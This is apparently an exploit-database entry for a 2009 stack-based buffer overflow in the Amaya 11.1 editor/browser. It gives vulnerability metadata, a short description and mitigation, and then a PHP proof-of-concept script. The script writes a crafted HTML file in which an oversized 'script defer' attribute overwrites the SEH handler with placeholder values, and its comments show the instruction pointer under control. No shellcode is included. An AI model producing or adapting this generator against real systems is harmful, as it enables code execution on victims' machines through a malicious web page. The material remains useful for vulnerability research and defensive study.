Amaya 11.1 W3C's editor/browser Stack Owerflow POC

vendor:

Amaya

by:

Alfons Luja

9.3

CVSS

HIGH

Stack Overflow

119

CWE

Product Name: Amaya

Affected Version From: 11.1

Affected Version To: 11.1

Patch Exists: Yes

Related CWE: N/A

CPE: a:w3c:amaya:11.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Amaya 11.1 W3C’s editor/browser Stack Owerflow POC

A stack-based buffer overflow vulnerability exists in Amaya 11.1 W3C's editor/browser. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. This vulnerability is due to a boundary error when handling specially crafted HTML files. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application by uploading a malicious HTML file.

Mitigation:

Upgrade to the latest version of Amaya 11.1 W3C's editor/browser.

Source

Exploit-DB raw data:

<?php

/**//*

     Amaya 11.1 W3C's editor/browser
     Stack Owerflow POC
     Discover by Alfons Luja 
     Thx : OiN 
     select * from friends --
     This stUff overwrite SEH in my box XP home sp 2 
     To correctly overwrite seh you must upload "remote_love.html" to remote server 
     Amaya allow only printable shellcode in this case   
     
     EAX:00000000
     ECX:43434343
     EDX:7C9037D8
     EBX:00000000
     ESP:0012DDD0
     EBP:0012DDF0
     ESI:00000000
     EDI:00000000
     EIP:43434343
     
      
*//**/ 

$junk = "\x41";
$n_seh = "\x42\x42\x42\x42";  //pointer to next seh
$h_seh = "\x43\x43\x43\x43";  //seh handler

for($i=1;$i<7000 - (4*19) - 10;$i++){ $junk.="\x41"; }

$junk.=$n_seh;
$junk.=$h_seh;
$hello = "<script defer=\"".$junk."\">";

$hnd = fopen("remote_love.html","w");
     
       if($hnd){

          fputs($hnd,$hello);
          fclose($hnd);
          echo"DONE !!\n";
     
       } else {

          echo"Kupa !!\n";

       }

?>

# milw0rm.com [2009-03-30]